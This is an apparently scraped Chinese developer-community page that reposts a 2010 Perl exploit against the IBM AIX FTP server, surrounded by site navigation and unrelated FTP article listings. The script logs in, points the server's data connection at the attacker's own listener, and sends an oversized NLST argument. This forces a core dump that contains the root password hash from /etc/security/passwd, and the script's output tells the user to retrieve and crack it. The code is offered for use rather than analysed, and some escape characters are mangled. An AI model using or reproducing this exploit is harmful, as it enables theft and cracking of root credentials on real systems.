AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Vuln: IBM AIX FTP Server 'NLST' Command Information Disclosure Vulnerability

2010-07-20 794
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: use IO::Socket; $|=1; print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ... 
use IO::Socket;
 
$|=1;
 
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--/n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd/n";
print "BY KINGCOPE/n";
print "JULY 2010/n/n";
 
if ($#ARGV < 1) {
    print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]/n";
    print "SAMPLES:/n";
    print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd/n";
    print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25/n";
    exit;
}
 
$trgt = $ARGV[0];
 
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s//./,/gi;                              
 
if ($ARGV[2] eq "") {
    $user = "ftp"; 
    $pass = "c0deb4b3/@roothash.com";
} else {
    $user = $ARGV[2];
    $passwd = $ARGV[3];
}
                         
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x/n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***/n";
print "/t$x";
print $sock "USER root/r/n";
$x = <$sock>;
print "/t$x";
print $sock "PASS sexy/r/n";
$x = <$sock>;
print "/t$x";
}
 
print "*AIX EXPLOIT* ACCESSING FOLDER***/n";
print $sock "USER $user/r/n";
$x = <$sock>;
print "/t$x";
print $sock "PASS $passwd/r/n";
$x = <$sock>;
print "/t$x";
 
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***/n";
print $sock "CWD pub/r/n";
$x = <$sock>;
print "/t$x";
}
 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "/r/n";
$x = <$sock>;
print "/t$x";
 
print "*AIX EXPLOIT* TRIGGERING COREDUMP***/n";
print $sock "NLST ~" . "A" x 5000 . "/r/n";
$x = <$sock>;
 
while(<$sock>) {
    print;
}
 
print "*AIX EXPLOIT* (SUCCESS)***/n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***/n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!/n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);  
}
## CHEERIO!
文章标签:
Unix
移动开发
机器学习/深度学习
网络协议
安全
关键词:
FTP server
ibm aix
ibm server disclosure
aix FTP
ibm vulnerability
cnbird
目录
相关文章
可惜已不在
|
1月前
|
网络协议 文件存储 Windows
Windows Server 2019 FTP服务器搭建
Windows Server 2019 FTP服务器搭建
可惜已不在
71 0
驰网飞飞
|
4月前
|
网络协议 Unix 网络安全
FTP服务器怎么搭建?Windows server搭建FPT服务器
FTP服务器是按照FTP协议提供文件传输服务的计算机。它用于在两台计算机间安全地传输文件,支持用户权限管理和跨平台操作。FTP使用控制连接处理命令,数据连接传输文件,有PORT和PASV模式。要搭建FTP服务器,首先在Windows Server 2008 R2上安装IIS,确保选中FTP服务。接着,创建FTP文件夹作为站点根目录,通过IIS管理器添加FTP站点,配置站点信息、身份验证和权限。测试客户端通过telnet和浏览器访问FTP服务器,确认能成功登录及浏览文件。FTP常用于文件共享和管理,可通过专用工具如FlashFXP上传下载文件。
驰网飞飞
166 0
FTP服务器怎么搭建?Windows server搭建FPT服务器
yaoxin521123
|
6月前
|
消息中间件 人工智能 Unix
第五十二章 使用 ^SystemPerformance 监视性能 - IBM AIX® 平台的 InterSystems IRIS 性能数据报告
第五十二章 使用 ^SystemPerformance 监视性能 - IBM AIX® 平台的 InterSystems IRIS 性能数据报告
yaoxin521123
54 0
大海里的番茄
|
存储 关系型数据库 MySQL
手把手教教会你使用Wing FTP Server安装配置并结合内网穿透实现公网访问本地站点
手把手教教会你使用Wing FTP Server安装配置并结合内网穿透实现公网访问本地站点
大海里的番茄
1471 0
cczhengv
|
存储 负载均衡 Java
nginx+ftp搭建图片服务器(Windows Server服务器环境下)
nginx+ftp搭建图片服务器(Windows Server服务器环境下)
cczhengv
573 0
游客du62snpusmjeg
|
供应链 安全 IDE
IBM WebSphere Application Server Liberty 安全漏洞(CVE-2022-22475)
IBM WebSphere Application Server Liberty 安全漏洞(CVE-2022-22475)
游客du62snpusmjeg
142 0
k4jbikbonzmci
|
弹性计算 安全 前端开发
阿里云ECS服务器配置Web项目和FTP Server
第一次使用阿里云ECS服务器部署Web项目和FTP Server,在使用过程中遇到了很多困难,但同时对计算机网络的工作原理有了更加清晰的认识。现将使用经历进行系统性地总结。 在阅读之前请确保已购买阿里云ECS云服务器并且初始化云服务器操作系统,本教程选用的操作系统为“Windows Server 2022 数据中心版 64位中文版”。
k4jbikbonzmci
361 0
3oixkwas4wki6
|
Windows
阿里云Windows Server 2012 R2服务器搭建FTP服务器(被动模式)
阿里云Windows Server 2012 R2服务器搭建FTP服务器(被动模式)
3oixkwas4wki6
727 0
阿里云Windows Server 2012 R2服务器搭建FTP服务器(被动模式)
小蓝枣
|
网络安全 Windows
Windows 技术篇-使用Windows Server 2012 R2服务器设置ftp共享文件路径实例演示
Windows 技术篇-使用Windows Server 2012 R2服务器设置ftp共享文件路径实例演示
小蓝枣
644 0
Windows 技术篇-使用Windows Server 2012 R2服务器设置ftp共享文件路径实例演示
桥志
|
存储 前端开发 对象存储
如何基于云存储网关SMB共享搭建FileZilla FTP server
本文介绍在windows 环境下,如何利用云存储网关提供的SMB共享,使用FileZilla Server搭建FTP服务器来访问对象存储(OSS)中的资源。
桥志
2477 0
如何基于云存储网关SMB共享搭建FileZilla FTP server

热门文章

最新文章

  • 1
    IBM大数据处理平台BigInsights(2)
  • 2
    AT&T、IBM等公司结成新的物联网网络安全联盟
  • 3
    IBM语言学家研发动听的机器语言,提升用户体验
  • 4
    PYTHON代码:根据位图间的关系,连接IBM V7000的8G BS位图
  • 5
    BF and IA vulnerabilities in IBM Lotus Domino
  • 6
    IBM发布人工智能显微镜,可检测海洋水资源
  • 7
    IBM宣布成功在单个原子上存储数据 存储方式将迎大变革
  • 8
    IBM推出新一代数据云服务 帮助企业“多知先觉”
  • 9
    ibm系列文章 --> Windows 到 Linux 之旅
  • 10
    D1net阅闻:IBM扩展在华云计算生态系统
  • 1
    LabVIEW与实时目标之间的FTP文件
    228
  • 2
    在Windows7搭建FTP服务器详细教学
    352
  • 3
    CentOS 7系统加固详细方案SSH FTP MYSQL加固
    184
  • 4
    Linux 配置FTP服务器 + vsftpd服务安装配置 (Good篇)
    176
  • 5
    使用Serv-U FTP服务器共享文件,实现无公网IP环境下远程访问-2
    125
  • 6
    使用Serv-U FTP服务器共享文件,实现无公网IP环境下远程访问-1
    111
  • 7
    自动化备份MySQL数据库并上传到远程FTP服务器
    175
  • 8
    如何使用Docker安装FTP服务器?
    460
  • 9
    DataWorks产品使用合集之在DataWorks中创建FTP Check节点的步骤如何解决
    104
  • 10
    DataWorks产品使用合集之在 DataWorks 中, FTP 主机和端口信息如何解决
    66

    • 相关电子书

    更多
  • IBM区块链之道
  • Network-Automation-Isn\'t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network
  • Offensive-Malware-Analysis-Dissecting-OSXFruitFly-Via-A-Custom-C&C-Server

    • 相关实验场景

    更多
  • 云上Web及FTP
  • Internet Information Services(IIS)部署Web项目
    • 下一篇
    无影云桌面